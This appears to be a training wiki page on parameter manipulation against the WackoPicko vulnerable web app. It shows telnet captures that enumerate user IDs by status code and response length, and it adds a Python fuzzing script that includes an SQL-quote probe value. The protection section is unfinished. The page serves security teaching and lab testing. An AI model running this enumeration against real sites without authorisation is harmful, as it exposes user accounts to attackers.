WackoPicko/Parameter-Manipulation
Description
This attack consists of sending arbitrary values (fuzzing) to a URL that accepts parameters and observing how the application behaves. Depending on how the application is coded, differences between its responses allow deductions to be made (e.g. whether a given userid exists).
Proof of Concept
A simple test consists of requesting the page with arbitrary parameter values and comparing the HTTP status codes returned.
The example below shows a 200 OK, telling us that userid #1 exists:
$ telnet 192.168.100.24 80
Trying 192.168.100.24...
Connected to 192.168.100.24.
Escape character is '^]'.
GET /users/sample.php?userid=1 HTTP/1.1
Host: 127.0.0.1

HTTP/1.1 200 OK
Date: Tue, 18 Jan 2011 21:49:31 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=u7nlio84alfpdlcjuagmfjcd61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2678
Content-Type: text/html
But userid #34 does not seem to exist: the server returns 404 Not Found, and the body is much shorter (108 bytes against 2678), which is a second signal worth comparing alongside the status code.
$ telnet 192.168.100.24 80
Trying 192.168.100.24...
Connected to 192.168.100.24.
Escape character is '^]'.
GET /users/sample.php?userid=34 HTTP/1.1
Host: 127.0.0.1

HTTP/1.1 404 Not Found
Date: Tue, 18 Jan 2011 21:50:26 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=j0avgessgvmc0udkc692nfhb73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 108
Content-Type: text/html
How to detect?
Various fuzzers can help identify such vulnerabilities: send a range of values for each parameter and look for differences in status code, response length or content between values.
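As an added example (not from the original page or from WackoPicko), the Python script below automates the proof of concept and the detection step above. The host (192.168.100.24:80), path (/users/sample.php) and parameter (userid) are the ones in the telnet sessions; the transport interface, the offline fake server and its response bodies are constructed here for demonstration. It records both the status code and the Content-Length for each value, since the two captures differ in both (200 with 2678 bytes versus 404 with 108 bytes), and groups values by the response class they produce.

```python
"""Added example for the parameter-manipulation test described on this page.

This script is not part of WackoPicko or the original write-up. The target
host (192.168.100.24:80), path (/users/sample.php) and parameter (userid)
come from the page; the transport interface, the fake offline server and
its response bodies are constructed here for demonstration.
"""
import re
import socket
from collections import defaultdict
from typing import Callable, Dict, Iterable, List, Tuple
from urllib.parse import quote

STATUS_RE = re.compile(rb"^HTTP/1\.[01] (\d{3})")
CONTENT_LENGTH_RE = re.compile(rb"Content-Length:\s*(\d+)", re.IGNORECASE)


def build_request(host: str, path: str, param: str, value: str) -> bytes:
    """Minimal HTTP/1.1 GET with one query parameter, as typed in the telnet session."""
    return (
        f"GET {path}?{param}={quote(value, safe='')} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def parse_response(raw: bytes) -> Tuple[int, int]:
    """Return (status code, Content-Length) from a raw response; length is -1 if absent."""
    match = STATUS_RE.match(raw)
    if not match:
        raise ValueError("no HTTP status line in response")
    headers = raw.split(b"\r\n\r\n", 1)[0]
    length = CONTENT_LENGTH_RE.search(headers)
    return int(match.group(1)), int(length.group(1)) if length else -1


def send_tcp(host: str, port: int, request: bytes, timeout: float = 5.0) -> bytes:
    """Live transport: one TCP connection per request, read until the server closes it."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def fuzz_param(send: Callable[[bytes], bytes], host: str, path: str, param: str,
               values: Iterable[object]) -> Dict[str, Tuple[int, int]]:
    """Send one request per candidate value; record (status, Content-Length) for each."""
    return {str(v): parse_response(send(build_request(host, path, param, str(v))))
            for v in values}


def group_by_status(results: Dict[str, Tuple[int, int]]) -> Dict[int, List[str]]:
    """Group values by status code. More than one group means the parameter leaks state."""
    groups: Dict[int, List[str]] = defaultdict(list)
    for value, (status, _length) in results.items():
        groups[status].append(value)
    return dict(groups)


# Constructed offline stand-in for the target: only userids 1, 2 and 5 "exist".
# Bodies are made up; the status/length split mirrors the 200/404 captures on the page.
_EXISTING_IDS = {"1", "2", "5"}


def fake_send(request: bytes) -> bytes:
    match = re.search(rb"userid=([^ &]*)", request)
    userid = match.group(1).decode("ascii") if match else ""
    if userid in _EXISTING_IDS:
        status, body = b"HTTP/1.1 200 OK", b"<html>profile of user %s</html>" % userid.encode()
    else:
        status, body = b"HTTP/1.1 404 Not Found", b"<html>no such user</html>"
    return (status + b"\r\nServer: Apache/2.2.17 (Unix) PHP/5.3.4\r\n"
            b"Content-Length: %d\r\nContent-Type: text/html\r\n\r\n" % len(body) + body)


def run(live: bool = False) -> Dict[int, List[str]]:
    host, port, path = "192.168.100.24", 80, "/users/sample.php"
    send = (lambda req: send_tcp(host, port, req)) if live else fake_send
    # Mix plausible ids with junk: out-of-range or non-numeric values often trigger a
    # third response class (500, stack trace) that is just as informative as 200 vs 404.
    values = list(range(1, 8)) + ["0", "-1", "abc", "1'"]
    groups = group_by_status(fuzz_param(send, host, path, "userid", values))
    for status, vals in sorted(groups.items()):
        print(f"{status}: {', '.join(vals)}")
    return groups


if __name__ == "__main__":
    run(live=False)
```

Run as-is, the script exercises the constructed fake and reports which values fell into the 200 group and which into the 404 group; run(live=True) sends the same requests to the real host. Keeping the Content-Length per value matters for applications that always answer 200 but render a different page for unknown ids: there the status groups collapse into one and the length is the only remaining oracle.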
How to protect against it?
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.